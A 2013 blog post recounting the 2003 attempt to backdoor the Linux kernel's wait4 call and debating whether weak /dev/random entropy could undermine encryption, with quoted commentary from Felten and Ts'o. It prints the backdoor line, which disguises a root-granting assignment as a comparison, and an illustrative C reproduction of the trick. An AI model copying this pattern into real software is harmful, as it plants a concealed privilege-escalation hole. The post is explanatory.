Linux Backdoors Revisited (New Revelations and Old Revelations)

Dr. Roy Schestowitz

2013-10-16 15:43:24 UTC
Modified: 2013-10-16 15:43:24 UTC

Claude Elwood Shannon, the man who introduced entropy

Summary: An anonymous attempt to backdoor Linux dates back a decade, and a randomisation weakness in today's Linux, one that could subvert encryption, also seems possible

Jonathan Allen wrote this article about an incident mentioned also by Freedom to Tinker. Slashdot's summary goes like this, documenting news from one decade ago:

"Ed Felten writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. But some people didn't like BitKeeper, so a second copy of the source code was kept in CVS. On November 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in electronically to the CVS server and inserted a small change to wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...' A casual reading makes it look like innocuous error-checking code, but a careful reader would notice that, near the end of the first line, it said '= 0' rather than '== 0' so the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words it's a classic backdoor. We don't know who it was that made the attempt, and we probably never will. But the attempt didn't work, because the Linux team was careful enough to notice that this code was in the CVS repository without having gone through the normal approval process. 'Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack,' writes Felten. 'Unless somebody confesses, or a smoking-gun document turns up, we'll never know.'"
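To see why a single missing '=' matters, here is a minimal userspace sketch of the check quoted above. It is not the kernel code: `struct demo_task`, the `DEMO_*` flag names and the two function names are hypothetical stand-ins invented for illustration, and the return value -1 merely plays the role of an error code.

```c
/* Hypothetical stand-ins for the kernel's option flags (illustration only). */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

/* Hypothetical stand-in for the kernel's per-process credentials. */
struct demo_task {
    unsigned int uid;   /* 0 means root */
};

/*
 * The check as it appeared in the tampered CVS copy: "=" ASSIGNS 0 to uid.
 * The value of the assignment expression is 0 (false), so the error branch
 * is never taken, but the caller's uid has already been set to root.
 */
static int backdoored_check(struct demo_task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        return -1;      /* never reached */
    return 0;
}

/*
 * What the line pretends to be: "==" only COMPARES uid with 0 and
 * leaves the caller's credentials untouched.
 */
static int honest_check(struct demo_task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        return -1;
    return 0;
}
```

Calling `backdoored_check` on a task with uid 1000 and both flags set returns 0, just as `honest_check` does, but leaves the task's uid at 0. With any other flag combination the `&&` short-circuits and nothing changes, which is what made the change look harmless in normal use.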

Torvalds may joke about backdoors in Linux, but given the above we should take the subject very seriously. Any system that lacks a good source of randomness (as some embedded devices do) typically cannot generate the high-entropy keys that strong encryption depends on. Given new alleged "insecurities in the Linux /dev/random," as Bruce Schneier put it, Linux backdoors seem possible again. David Benfell said:

I'm guessing Schneier knows what the fuck he's talking about. If it is the same vulnerability, then Torvalds' defense is that the vulnerable source of entropy is only one of many. But if I read Schneier correctly, the result was still too predictable.

"On the other hand," says Benfell, "here's Theodore Ts'o from the comments:"

So I'm the maintainer for Linux's /dev/random driver. I've only had a chance to look at the paper very quickly, and I will look at it more closely when I have more time, but what the authors of this paper seem to be worried about is not even close to the top of my list in terms of things I'm worried about.

First of all, the paper is incorrect in some minor details; the most significant error is its (untrue) claim that we stop gathering entropy when the entropy estimate for a given entropy pool is "full". Before July 2012, we went into a trickle mode where we only took in 1 in 4096 values. Since then, the main way that we gather entropy, which is via add_interrupt_randomness(), has no such limit. This means that we will continue to collect entropy even if the input pool is apparently "full".

This is critical, because *secondly* their hypothetical attacks presume certain input distributions which have an incorrect entropy estimate: that is, either zero actual entropy but a high entropy estimate, or a high entropy, but a low entropy estimate. There has been no attempt by the paper's authors to determine whether the entropy gathered by Linux meets either of their hypothetical models, and in fact in the "Linux Pseudorandom Number Generator Revisited" [1], the analysis showed that our entropy estimator was actually pretty good, given the real-life inputs that we are able to obtain from an actual running Linux system.

[1] http://eprint.iacr.org/2012/251.pdf

The main thing which I am much more worried about is that on various embedded systems, which do not have a fine-grained clock, and which is reading from flash which has a much more deterministic timing for their operations, is that when userspace tries to generate long-term public keys immediately after the machine is taken out of the box and plugged in, that there isn't a sufficient amount of entropy, and since most userspace applications use /dev/urandom since they don't want to block, that they end up with keys that aren't very random. We had some really serious problems with this, which was written up in the "Mining Your Ps and Qs: Detection of Widespread Weak Keys in Network Devices" paper [2], and the changes made in July 2012 were specifically designed to address these worries.

[2] https://www.factorable.net/paper.html

However, it may be that on certain systems, in particular ARM and MIPS based systems, where a long-term public key is generated very shortly after the first power-on, that there's enough randomness that the techniques used in [2] would not find any problems, but that might be not enough randomness to prevent our friends in Fort Meade from being able to brute force guess the possible public-private key pairs.

Speaking more generally, I'm a bit dubious about academic analyses which are primarily worried about recovering from the exposure of the state of the random pool. In practice, if the bad guy can grab the state of the random pool, they probably have enough privileged access that they can do many more entertaining things, such as grabbing the user's passphrase or their long-term private key. Trying to preserve the amount of entropy in the pool, and making sure that we can extract as much uncertainty from the system as possible, are much higher priority things to worry about.

That's not to say that I might not make changes to /dev/random in reaction to academic analysis; I've made changes in reaction to [2], and I have changes queued up for the next major kernel release to address concerns raised in [1]. However, protection against artificially constructed attacks is not the only thing which I am worried about. Things like making sure we have adequate entropy collection on all platforms, especially embedded ones, and adding some conservatism just in case SHA isn't a perfect random function are some of the other things which I am trying to balance as we make changes to /dev/random.

Ts'o, who is the former CTO of the Linux Foundation, at least acknowledges the possibility that there is a real issue here.
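The embedded-device worry Ts'o raises, keys generated straight after first power-on with too little entropy, can be illustrated with a toy sketch. Everything here is an assumption made for illustration: the generator is a simple 64-bit linear congruential generator (not cryptographically secure, and not what the kernel uses), and `boot_seed` is a hypothetical stand-in for whatever state a device has gathered by the time it generates its key.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy deterministic generator (64-bit LCG). NOT secure; illustration only. */
struct toy_prng {
    uint64_t state;
};

static uint8_t toy_next_byte(struct toy_prng *g)
{
    /* Constants are from a commonly used 64-bit LCG parameter set. */
    g->state = g->state * 6364136223846793005ULL + 1442695040888963407ULL;
    return (uint8_t)(g->state >> 56);   /* use the top byte of the state */
}

/*
 * Derive a "key" from the device's boot-time state. If two devices reach
 * this point with the same boot_seed, they produce the same key.
 */
static void toy_generate_key(uint64_t boot_seed, uint8_t *key, size_t len)
{
    struct toy_prng g = { boot_seed };
    for (size_t i = 0; i < len; i++)
        key[i] = toy_next_byte(&g);
}

/* Returns 1 if the two keys are byte-for-byte identical, 0 otherwise. */
static int keys_equal(const uint8_t *a, const uint8_t *b, size_t len)
{
    return memcmp(a, b, len) == 0;
}
```

Two hypothetical devices that boot with the same seed end up with identical keys, while a device whose seed differs by even one gets a different key. The practical point is the one made in the quotation: the output can only be as unpredictable as the state that went in, however good the generator.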
